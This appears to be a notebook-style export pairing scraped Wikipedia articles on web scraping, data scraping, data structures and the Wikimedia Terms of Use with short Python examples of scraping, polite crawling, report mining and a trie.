case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
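As a concrete illustration of the first two techniques described in this row (plain regular-expression matching and DOM parsing), the short sketch below applies both to the same page, reusing the requests, re, and BeautifulSoup imports already loaded at the top of this notebook. The target URL and the e-mail pattern are placeholders for illustration, not anything taken from the text above.
# Minimal sketch: regex-style extraction vs. DOM parsing on the same page.
# The URL and the e-mail pattern are illustrative placeholders.
import re
import requests
from bs4 import BeautifulSoup
url = "https://example.com"          # hypothetical target page
html = requests.get(url, timeout=10).text
# 1) grep/regex style: pull anything that looks like an e-mail address
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)
# 2) DOM-parsing style: build a tree and walk it for structured pieces
soup = BeautifulSoup(html, "html5lib")
title = soup.title.string if soup.title else None
links = [a.get("href") for a in soup.find_all("a", href=True)]
print(title, len(links), emails[:5])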
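Of the tools listed in this row, Scrapy is the one that structures an entire crawl rather than a single request. The sketch below is a minimal spider in the style of the official tutorial; the spider name, the start URL (a public practice site), and the CSS selectors are assumptions for illustration only.
# Minimal Scrapy spider sketch (illustrative only).
# Save as, e.g., quotes_spider.py and run:  scrapy runspider quotes_spider.py -o quotes.json
import scrapy
class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]   # public practice site
    def parse(self, response):
        # Extract one record per quote block on the page
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow pagination, if present
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)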
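The row above ends by noting that site administrators use various measures to stop or slow bots. On the scraper's side, the usual cooperative behaviour is to honour robots.txt and to throttle requests; the sketch below does both with the standard library's urllib.robotparser plus requests. The base URL, paths, user-agent string, and fallback delay are illustrative assumptions.
# Sketch of a "polite" scraper: check robots.txt before fetching and rate-limit requests.
import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser
base = "https://example.com"         # hypothetical site
agent = "my-research-bot"            # hypothetical user-agent string
robots = RobotFileParser()
robots.set_url(urljoin(base, "/robots.txt"))
robots.read()
paths = ["/", "/about", "/products"]
delay = robots.crawl_delay(agent) or 2   # fall back to 2 seconds if no Crawl-delay is set
for path in paths:
    url = urljoin(base, path)
    if not robots.can_fetch(agent, url):
        print("Disallowed by robots.txt, skipping:", url)
        continue
    response = requests.get(url, headers={"User-Agent": agent}, timeout=10)
    print(url, response.status_code)
    time.sleep(delay)                    # simple rate limiting between requests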
8 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-3 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport and storage mechanism between the client and the web server. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner.
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
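To ground the distinction this row draws between structured interchange formats and output meant for people, the sketch below scrapes an invented plain-text report into a pandas DataFrame with a regular expression. The report layout, field names, and pattern are assumptions made purely for demonstration.
# Sketch of data scraping in the narrow sense: parsing output intended for a
# human reader (an invented plain-text report) into structured records.
import re
import pandas as pd
report = """ACME MONTHLY SALES REPORT
Region: North    Units: 1,240   Revenue: $56,300
Region: South    Units:   980   Revenue: $44,150
Region: West     Units: 1,575   Revenue: $71,020
"""
pattern = re.compile(
    r"Region:\s+(?P<region>\w+)\s+Units:\s+(?P<units>[\d,]+)\s+Revenue:\s+\$(?P<revenue>[\d,]+)"
)
rows = [m.groupdict() for m in pattern.finditer(report)]
df = pd.DataFrame(rows)
df["units"] = df["units"].str.replace(",", "").astype(int)
df["revenue"] = df["revenue"].str.replace(",", "").astype(int)
print(df)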
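This row also mentions newer scraping that listens to the JSON feeds a site already serves to its own front end. A minimal version of that idea, assuming a hypothetical JSON endpoint that returns a list of records, looks like this:
# Sketch: consume a JSON feed directly instead of parsing rendered HTML.
# The endpoint URL is a hypothetical placeholder.
import requests
import pandas as pd
feed_url = "https://example.com/api/products.json"   # assumed JSON feed
response = requests.get(feed_url, timeout=10)
response.raise_for_status()
items = response.json()                # parsed straight from JSON, no HTML parsing
df = pd.DataFrame(items)               # store for subsequent analysis
df.to_csv("products.csv", index=False)
print(df.head())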
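Finally, report mining as described at the end of this row can often be done with pandas alone once a report has been spooled to an HTML or text file. The sketch below assumes a small invented HTML report and extracts its table with pandas.read_html, which can use the html5lib and bs4 parsers installed at the top of this notebook.
# Sketch of report mining: the "source system" writes a human-readable HTML
# report to a file (stand-in for a spool file); we extract its table offline.
import pandas as pd
from io import StringIO
spooled_report = """
<html><body>
<h1>Daily Stock Report</h1>
<table>
  <tr><th>Item</th><th>On hand</th><th>Reorder level</th></tr>
  <tr><td>Widget A</td><td>120</td><td>50</td></tr>
  <tr><td>Widget B</td><td>35</td><td>40</td></tr>
</table>
</body></html>
"""
tables = pd.read_html(StringIO(spooled_report))   # returns a list of DataFrames
stock = tables[0]
low_stock = stock[stock["On hand"] < stock["Reorder level"]]
print(low_stock)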
9 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_structures | In computer science, a data structure is a data organization, and storage format that is usually chosen for efficient access to data. 1 2 3 More precisely, a data structure is a collection of data values, the relationships among them, and the functions or operations that can be applied to the data, 4 i.e., it is an algebraic structure about data. Data structures serve as the basis for abstract data types (ADT). The ADT defines the logical form of the data type. The data structure implements the physical form of the data type. 5 Different types of data structures are suited to different kinds of applications, and some are highly specialized to specific tasks. For example, relational databases commonly use B-tree indexes for data retrieval, 6 while compiler implementations usually use hash tables to look up identifiers. 7 Data structures provide a means to manage large amounts of data efficiently for uses such as large databases and internet indexing services. Usually, efficient data structures are key to designing efficient algorithms. Some formal design methods and programming languages emphasize data structures, rather than algorithms, as the key organizing factor in software design. Data structures can be used to organize the storage and retrieval of information stored in both main memory and secondary memory. 8 Data structures can be implemented using a variety of programming languages and techniques, but they all share the common goal of efficiently organizing and storing data. 9 Data structures are generally based on the ability of a computer to fetch and store data at any place in its memory, specified by a pointer—a bit string, representing a memory address, that can be itself stored in memory and manipulated by the program. Thus, the array and record data structures are based on computing the addresses of data items with arithmetic operations, while the linked data structures are based on storing addresses of data items within the structure itself. This approach to data structuring has profound implications for the efficiency and scalability of algorithms. For instance, the contiguous memory allocation in arrays facilitates rapid access and modification operations, leading to optimized performance in sequential data processing scenarios. 10 The implementation of a data structure usually requires writing a set of procedures that create and manipulate instances of that structure. The efficiency of a data structure cannot be analyzed separately from those operations. This observation motivates the theoretical concept of an abstract data type, a data structure that is defined indirectly by the operations that may be performed on it, and the mathematical properties of those operations (including their space and time cost). 11 There are numerous types of data structures, generally built upon simpler primitive data types. Well known examples are: 12 A trie, or prefix tree, is a special type of tree used to efficiently retrieve strings. In a trie, each node represents a character of a string, and the edges between nodes represent the characters that connect them. This structure is especially useful for tasks like autocomplete, spell-checking, and creating dictionaries. Tries allow for quick searches and operations based on string prefixes. Most assembly languages and some low-level languages, such as BCPL (Basic Combined Programming Language), lack built-in support for data structures. 
On the other hand, many high-level programming languages and some higher-level assembly languages, such as MASM, have special syntax or other built-in support for certain data structures, such as records and arrays. For example, the C (a direct descendant of BCPL) and Pascal languages support structs and records, respectively, in addition to vectors (one-dimensional arrays) and multi-dimensional arrays. 14 15 Most programming languages feature some sort of library mechanism that allows data structure implementations to be reused by different programs. Modern languages usually come with standard libraries that implement the most common data structures. Examples are the C++ Standard Template Library, the Java Collections Framework, and the Microsoft .NET Framework. Modern languages also generally support modular programming, the separation between the interface of a library module and its implementation. Some provide opaque data types that allow clients to hide implementation details. Object-oriented programming languages, such as C++, Java, and Smalltalk, typically use classes for this purpose. Many known data structures have concurrent versions which allow multiple computing threads to access a single concrete instance of a data structure simultaneously. 16 |
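The trie described in this row is small enough to sketch directly. The following minimal Python implementation is an illustration, not taken from the text; it supports insertion, exact lookup, and the prefix queries used for autocomplete.
# Minimal trie sketch: insert strings, then query exact words and prefixes.
class TrieNode:
    def __init__(self):
        self.children = {}     # character -> TrieNode
        self.is_word = False
class Trie:
    def __init__(self):
        self.root = TrieNode()
    def insert(self, word):
        node = self.root
        for ch in word:
            node = node.children.setdefault(ch, TrieNode())
        node.is_word = True
    def contains(self, word):
        node = self._walk(word)
        return node is not None and node.is_word
    def starts_with(self, prefix):
        return self._walk(prefix) is not None
    def _walk(self, s):
        node = self.root
        for ch in s:
            node = node.children.get(ch)
            if node is None:
                return None
        return node
trie = Trie()
for w in ["scrape", "scraper", "scraping", "screen"]:
    trie.insert(w)
print(trie.contains("scraper"), trie.starts_with("scr"), trie.contains("scr"))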
10 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-30 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation.
|
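The fetch, extract, and store steps described in this row can be tied together in a few lines. The following sketch downloads a page, collects its links and any e-mail addresses (a simple form of contact scraping), and writes the result to a CSV; the target URL, output filename, and e-mail pattern are illustrative assumptions, and it reuses the requests, BeautifulSoup, re, pandas, and urljoin imports from the top of this notebook.
# End-to-end sketch of the fetch -> extract -> store loop.
# The URL and output filename are illustrative placeholders.
import re
import requests
import pandas as pd
from bs4 import BeautifulSoup
from urllib.parse import urljoin
url = "https://example.com"
html = requests.get(url, timeout=10).text             # fetching
soup = BeautifulSoup(html, "html5lib")                 # extraction
records = []
for a in soup.find_all("a", href=True):
    records.append({
        "text": a.get_text(strip=True),
        "href": urljoin(url, a["href"]),
    })
emails = sorted(set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)))
pd.DataFrame(records).to_csv("links.csv", index=False) # storage
print(f"{len(records)} links, {len(emails)} e-mail addresses found")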
11 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. You are free to: Under the following conditions: With the understanding that: If you need help or you want to report a violation of these Terms of Use you can: Our Terms of Use Imagine a world in which every single human being can freely share in the sum of all knowledge. That's our commitment. Our Vision Statement Welcome to Wikimedia The Wikimedia Foundation, Inc. ("we" or "us" or "Foundation"), is a non-profit charitable organization, headquartered in San Francisco, California, United States, whose mission is to empower and engage people around the world to collect and develop content under a free license or in the public domain, and to disseminate it effectively and globally, free of charge. To support our vibrant community, we provide the essential infrastructure and organizational framework for the development of multilingual wiki projects and their editions (as explained on our Wikimedia Projects page) (hereby referred to as "Projects") and other endeavors which serve this mission. We strive to make and keep educational and informational content from the Projects available on the internet free of charge, in perpetuity. We welcome you ("you" or the "user") as a reader, or contributor of the Projects, and we encourage you to join the Wikimedia community. Before you participate, however, we ask that you please read and agree to the following Terms of Use ("Terms of Use"). These Terms of Use tell you about our public services at the Wikimedia Foundation, our relationship to you as a user, and the rights and responsibilities that guide us both. We host an incredible quantity of educational and informational content, all of which is contributed and made possible by users like yourself. Generally we do not contribute, monitor, or delete content (with rare exceptions, such as under policies like these Terms of Use, for legal compliance, or when faced with urgent threats of serious harm). This means that editorial control is in the hands of you and your fellow users who create and manage the content. The community the network of users who are constantly building and using the Projects and or their websites (hereby referred to as "Project Websites") is the principal means through which the goals of the mission are achieved. The community contributes to and helps govern our Projects and Project Websites. The community also undertakes the critical function of creating and enforcing policies for the specific Project editions (such as the different language editions for the Wikipedia Project or the Wikimedia Commons multilingual edition). You, the user, are welcome to join as a contributor, editor, or author, but you should follow the policies that govern each of the independent Project editions, including the Universal Code of Conduct (UCoC), which apply to all Project editions. The largest of our Projects is Wikipedia, but we host other Projects too, each with different objectives and work methods. Each Project edition has a team of contributors, editors or authors who work together to create and manage the content on that Project edition. You are welcome to join these teams and work with them to improve these Projects. 
Since we are dedicated to making content freely accessible to the public, content you contribute is made available under a free license or released in the public domain. Please be aware that you are legally responsible for all of your contributions, edits, and reuse of Wikimedia content under the laws of the United States of America and other applicable laws (which may include laws where you or the subject of your contributions are located). This means it is important that you exercise caution when posting, modifying or reusing content. In light of this responsibility, we have some rules about what you cannot do, most of which are either for your own protection or for the protection of other users like yourself. Please keep in mind that the content we host is for general informational purposes only, so if you need expert advice for a particular question (such as medical, legal, or financial issues), you should seek the help of an appropriate professional. We also include other important notices and disclaimers, so please read these Terms of Use in their entirety. For clarity, other organizations, such as local Wikimedia chapters and associations, that may share in the same mission are nevertheless legally independent and separate from the Wikimedia Foundation. Unless otherwise stated by the Foundation as an authorized party on a given Project's Website, those other organizations have no responsibility for the operations of the Project's Website or its content. The Wikimedia Foundation is dedicated to encouraging the growth, development, and distribution of free multilingual content, and to hosting the full content of these wiki-based Projects for the public free of charge. Our role is to host some of the largest collaboratively edited reference Projects in the world, which can be found here. However, we act only as a hosting service provider, maintaining the infrastructure and organizational framework. This infrastructure and framework allow our users to build the Projects by contributing and editing content themselves. They also allow our users to reuse that content. The infrastructure we maintain includes specialized technological infrastructure that enables users to programmatically interact with and reuse content on Projects (referred to as "Application Programming Interface" or "APIs"), and mobile applications. As used throughout the rest of the Terms of Use, our services consist of: The Project Websites we host, technological infrastructure that we maintain, and any technical spaces that we host for the maintenance and improvement of our Projects. Because of our unique role, there are a couple of things you should be aware of when considering our relationship to you, the Projects, and other users: We ask that you review the terms of our Privacy Policy, so that you are aware of how we collect and use your information. The Projects hosted by the Wikimedia Foundation only exist because of the vibrant community of users like you who collaborate to write, edit, and curate the content. We happily welcome your participation in this community. We encourage you to be civil and polite in your interactions with others in the community, to act in good faith, and to make edits and contributions aimed at furthering the mission of the shared Project. We ask that all users review and follow the Universal Code of Conduct ("UCoC"), which lays out requirements for collegial, civil collaboration across all Projects that we host. 
Certain activities, whether legal or illegal under the applicable law, may be harmful to other users and violate our rules, and some activities may also subject you to liability. Therefore, for your own protection and for that of other users, you may not engage in such activities on, or otherwise using, our Projects. These activities include: We reserve the right to exercise our enforcement discretion with respect to the provisions in section 4 of these Terms of Use. Where required, enforcement of these terms may include actions not listed in the Wikimedia Foundation Office Action Policy. If enforcement is required in new circumstances, we will make an effort within at most one (1) year to update the Office Action Policy to catalog the new type of action. Marketing Company Mediations Undisclosed editing by users receiving compensation creates an unreasonable burden on volunteer editors who investigate and enforce community policies. Therefore, for violations of this section related to undisclosed paid editing, you agree to submit to binding "Med-Arb" (a "Marketing Company Mediation") as described in section 14 of these Terms of Use. You are responsible for safeguarding your own password and other security credentials, and should never disclose them to any third party. Although you have considerable freedoms for reuse of the content on the Project Websites, it is important that, at the Wikimedia Foundation, we protect our trademark rights so that we can protect our users from fraudulent impersonators. Because of this, we ask that you please respect our trademarks. All Wikimedia Foundation trademarks belong to the Wikimedia Foundation, and any use of our trade names, trademarks, service marks, logos, or domain names must be in compliance with these Terms of Use and in compliance with our Trademark Policy. To grow the commons of free knowledge and free culture, all users contributing to the Projects or Project Websites are required to grant broad permissions to the general public to redistribute and reuse their contributions freely, so long as that use is properly attributed and the same freedom to reuse and redistribute is granted to any derivative works. In keeping with our goal of providing free information to the widest possible audience, we require that when necessary all submitted content be licensed so that it is freely reusable by anyone who may access it. You agree to the following licensing requirements: If the text content was imported from another source, it is possible that the content is licensed under a compatible CC BY-SA license but not GFDL (as described in "Importing text, above). In that case, you agree to comply with the compatible CC BY-SA license and do not have the option to relicense it under GFDL. To determine the license that applies to the content that you seek to reuse or redistribute, you should review the page footer, page history, and discussion page. In addition, please be aware that text that originated from external sources and was imported into a Project may be under a license that attaches additional attribution requirements. Users agree to indicate these additional attribution requirements clearly. Depending on the Project, such requirements may appear, for example, in a banner or other notations pointing out that some or all of the content was originally published elsewhere. Where there are such visible notations, reusers should preserve them. 
The Wikimedia Foundation wants to ensure that the content that we host can be reused by other users without fear of liability and that it is not infringing the proprietary rights of others. In fairness to our users, as well as to other creators and copyright holders, our policy is to respond to notices of alleged infringement that comply with the formalities of the Digital Millennium Copyright Act ("DMCA"). Pursuant to the DMCA, we will terminate, in appropriate circumstances, users and account holders of our system and network who are repeat infringers on our Projects and services. However, we also recognize that not every takedown notice is valid or in good faith. In such cases, we strongly encourage users to file counter-notifications when they appropriately believe a DMCA takedown demand is invalid or improper. For more information on what to do if you think a DMCA notice has been improperly filed, you may wish to consult the Lumen Database website. If you are the owner of content that is being improperly used on one of the Projects without your permission, you may request that the content be removed by filing a notice under the DMCA. To make such a request, please email us at legal@wikimedia.org or snail mail our designated agent. Alternatively, you may make a request to our community, which often handles copyright issues faster and more effectively than the process prescribed under the DMCA. In that case, you can post a notice explaining your copyright concerns. For a non-exhaustive and non-authoritative list of the relevant processes for the different Project editions, visit the Copyright Problems page. Before filing a DMCA claim, you also have the option of sending an email to the community at info@wikimedia.org. You are solely responsible for your use of any third-party websites or resources. Although the Projects and Project Websites contain links to third-party websites and resources, we do not endorse and are not responsible or liable for their availability, accuracy, or the related content, products, or services (including, without limitation, any viruses or other disabling features), nor do we have any obligation to monitor such third-party content. The community has the primary role in creating and enforcing policies applying to the different Project editions. At the Wikimedia Foundation, we rarely intervene in community decisions about policy and its enforcement. It is possible to notify us of illegal content, or content that violates our Terms of Use (including all policies and other documents incorporated by reference) for other reasons by contacting us directly. However, you can typically make a request directly to the Project's community: this may be more efficient, and is more consistent with our Projects' aim to empower the user community. Each Project will usually provide "Help" or "Contact" pages for further guidance, or specific tools for reporting issues. Alternatively, if in doubt, you can ask members of the community for help, by sending an email to info@wikimedia.org or a more language-specific address from the Volunteer Response Team page. Please note that these mailboxes are monitored by users of the Projects, not the Foundation. As a result, they should not be threatened or issued with legal demands. If you contact the Foundation with a problem, we will typically explore whether and how existing community-led mechanisms can investigate and, where appropriate, resolve it.
In an unusual case, the need may arise, or the community may ask us, to address an especially problematic user or especially problematic content because of significant Project disturbance or dangerous behavior. In such cases, we reserve the right, at our sole discretion (or where legally compelled), to: Those Foundation moderation activities may be informed or performed by software (such as traffic flood ("Denial of Service") protection). In those cases human review is normally available, upon request. In the interests of our users and the Projects, in the extreme circumstance that any individual has had their account or access blocked under this section, they are prohibited from creating or using another account on or seeking access to the same Project, unless we provide explicit permission. Without limiting the authority of the community, the Foundation itself will not ban a user from editing or contributing or block a user's account or access solely because of good faith criticism that does not result in actions otherwise violating these Terms of Use or community policies. The Wikimedia community and its members may also take action when so allowed by the community or Foundation policies applicable to the specific Project edition, including but not limited to warning, investigating, blocking, or banning users who violate those policies. You agree to comply with the final decisions of dispute resolution bodies that are established by the community for the specific Project editions (such as arbitration committees); these decisions may include sanctions as set out by the policy of the specific Project edition. Especially problematic users who have had accounts or access blocked on multiple Project editions may be subject to a ban from all of the Project editions, in accordance with the Global Ban Policy. In contrast to Board resolutions or these Terms of Use, policies established by the community, which may cover a single Project edition or multiple Projects editions (like the Global Ban Policy), may be modified by the relevant community according to its own procedures. The blocking of an account or access or the banning of a user under this provision shall be in accordance with Section 13 of these Terms of Use. If you believe we have not satisfactorily acted on a problematic content report, or if you have been subjected to a Foundation moderation action that you wish to challenge, you may be able to submit an appeal. Other information about routes of appeal may also be explained to you at the time, or in Project-specific help pages. We reserve the right to suspend (temporarily, or permanently) our handling of reports or other correspondence from users or third parties, whether about allegedly illegal or otherwise problematic content or conduct, or requesting appeals against moderation actions, if such correspondence was made in bad faith, repetitive, unfounded, and or abusive. In appropriate circumstances, your email address may even be blocked on our email system(s), and you will then need to contact us at our postal address if you wish to further correspond with us during that block. For less serious cases (e.g. up to three polite emails about one or more meritless complaints), this is likely to be temporary. More frequent or more abusive communications are more likely to lead to permanent measures. The Wikimedia Foundation Board of Trustees releases official policies from time to time. 
Some of these policies may be mandatory for a particular Project or Project edition, and, when they are, you agree to abide by them as applicable. We make available a set of APIs, which include documentation and associated tools, to enable users to build products that promote free knowledge. By using our APIs, you agree to abide by all applicable policies governing the use of the APIs, which include but are not limited to the User-Agent Policy, the Robot Policy, and the API:Etiquette (collectively, "API Documentation"), which are incorporated into these Terms of Use by reference. Though we hope you will stay and continue to contribute to the Projects, you can stop using our services any time. In certain (hopefully unlikely) circumstances it may be necessary for either ourselves or the Wikimedia community or its members (as described in Section 10) to terminate part or all of our services, terminate these Terms of Use, block your account or access, or ban you as a user. If your account or access is blocked or otherwise terminated for any reason, your public contributions and a record of your activities on or in relation to the Projects (including any correspondence you have sent us) will be unaffected (subject to applicable policies), and you may still access our public pages for the sole purpose of reading publicly available content on the Projects. In such circumstances, however, you may not be able to access your account or settings. However, regardless of any other provision in these Terms of Use, we reserve the right to suspend or end the services at any time, with or without cause, and with or without notice. Even after your use and participation are banned, blocked or otherwise suspended, these Terms of Use will remain in effect with respect to relevant provisions, including Sections 1, 3, 4, 6, 7, 9 16, and 18. We hope that no serious disagreements arise involving you, but, in the event there is a dispute, we encourage you to seek resolution through the dispute resolution procedures or mechanisms provided by the Projects or Project editions and the Wikimedia Foundation. If you seek to file a legal claim against us, you agree to file and resolve it exclusively in a state or federal court located in San Francisco County, California. You also agree that the laws of the State of California and, to the extent applicable, the laws of the United States of America will govern these Terms of Use, as well as any legal claim that might arise between you and us (without reference to conflict of laws principles). You agree to submit to the personal jurisdiction of, and agree that venue is proper in, the courts located in San Francisco County, California, in any legal action or proceeding relating to us or these Terms of Use. To ensure that disputes are dealt with soon after they arise, you agree that regardless of any statute or law to the contrary, any claim or cause of action you might have arising out of or related to use of our services or these Terms of Use must be filed within the applicable statute of limitations or, if earlier, one (1) year after the pertinent facts underlying such claim or cause of action could have been discovered with reasonable diligence (or be forever barred). Marketing Company Mediations As described in section 4 of these Terms of Use, you agree to resolve violations of the Paid Contributions without Disclosure in a Marketing Company Mediation at the Foundation's discretion. 
